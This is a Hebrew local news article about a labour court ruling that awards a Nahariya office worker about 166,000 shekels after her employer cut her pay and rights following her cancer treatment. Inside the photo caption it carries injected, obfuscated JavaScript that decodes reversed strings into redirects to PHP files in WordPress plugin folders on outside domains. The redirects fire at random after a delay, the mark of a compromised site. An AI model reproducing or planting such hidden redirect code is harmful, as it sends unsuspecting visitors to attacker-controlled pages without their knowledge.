fbpx
[shortcode-weather-atlas city_selector=1178237 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

בית הדין לעבודה פסק לטובת תושבת נהריה 166,000 ₪ בשל הרעה בתנאי העסקתה

עו"ד יניב ברוך שייצג את העובדת: "המסר החשוב של בית המשפט הוא שזכויות עובד לא ניתן לרמוס, וחשוב להעניק לעובדים את המעמד הראוי, וודאי כשבריאותם נפגעת, בכל ארגון וחברה".
Photo by energepic.com from Pexels
Pho$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}to by energepic.com from Pexels

במשך 20 שנה עבדה תושבת נהריה בת 54, במשרד אדריכלים בעיר חיפה.

לאורך השנים ביססה את מעמדה במשרד ותרמה את מיטב שנותיה. העובדת, שימשה כיד ימינו של מנהל החברה, כולל אחריות על נושאים כספיים ושותפות חתימה בחשבון הבנק של העסק.

בשנת 2017 חלתה בסרטן השד, עברה ניתוח להסרת הגידול, ויחד עם זאת, סייעה ככל הניתן למנהלה ולעובדים, ממיטת חוליה. כשחזרה לעבודה, נאלצה להמשיך בטיפולי הקרנות במשך שבועות ארוכים ובחרה לקיים אותן בשעות הערב, על מנת שלא לפגוע בתפקוד המשרד.

בשנת 2018, לאחר שסיימה עם ההקרנות וחזרה באופן מלא לתפקידה, החל בעל החברה לא לשלם משכורות לעובדים וכן לפגוע בזכויותיהם הסוציאליות, כולל לעובדת שחזרה מתקופה ארוכה של החלמה מסרטן.

לאחר שהבינה שקיימת בעיה לא פשוטה בתזרים העסק, הגישה העובדת מכתב בו היא מודיעה שלאור הרעת התנאים מבקשת להתפטר כדין מפוטר, וזאת בשל הרעה בתנאי העסקתה. לבעל החברה ניתן הזמן לטפל בנושא, אך בצעד חריג ומבלי לעדכנה, ביטל את הרשאתה בחשבון הבנק בו היא מורשית חתימה, ובעצם, השאיר אותה ללא מענה וללא עבודה בזמן שאינו משלם את משכורתה ואת תנאיה הסוציאליים.

העובדת פנתה לבית הדין לעבודה, באמצעות עו"ד יניב ברוך. "לא תכננתי להגיע למעמד כזה. לא האמנתי שאחרי 20 שנות עבודה שאגיע למצב כזה". טענה בפני השופטת. לטענת הנתבע, לאחר שיחה שקיים עם הנתבעת טרם קבלת מכתבה, המתין לתשובתה, אך זו ביקשה בסופו של דבר להגיש לו את הודעתה על הפיטורין. יחד עם זאת, הוכיח בית המשפט כי ביטול הרשאתה בחשבון, מוכיח על כך שלא התכוון להגיע איתה אל עמק השווה.

לאחר שבית המשפט שמע את טיעוני שני הצדדים ולאחר סיכומים בין הצדדים, הוחלט לפסוק לטובת העובדת סכום של כ – 166,000 שקלים הכולל את כל הרכיבים הסוציאליים והוצאות עו"ד.

עו"ד יניב ברוך. צילום: פרטי
עו"ד יניב ברוך. צילום: פרטי

עו"ד יניב ברוך: ״בסיומה של פרשה בת שנתיים ימים מצא בית הדין הנכבד לאמץ את עמדת מרשתי לפיה התנהלות הנתבע היוותה הרעה מוחשית בתנאי העסקתה של התובעת אשר הובילה אותה להתפטרות כדין מפוטר תוך תשלום מלוא זכויותיה והוצאותיה. המסר החשוב של בית המשפט הוא שזכויות עובד לא ניתן לרמוס, וחשוב להעניק לעובדים את המעמד הראוי, וודאי כשבריאותם נפגעת, בכל ארגון וחברה".

 

הישארו מעודכנים באתר בלינקר ובפייסבוק של צפון 1 גליל מערבי וחדשות נהריה!

אהבתם? שתפו!

תגיות

אולי גם יעניין אותך

שיתוף ברשתות החברתיות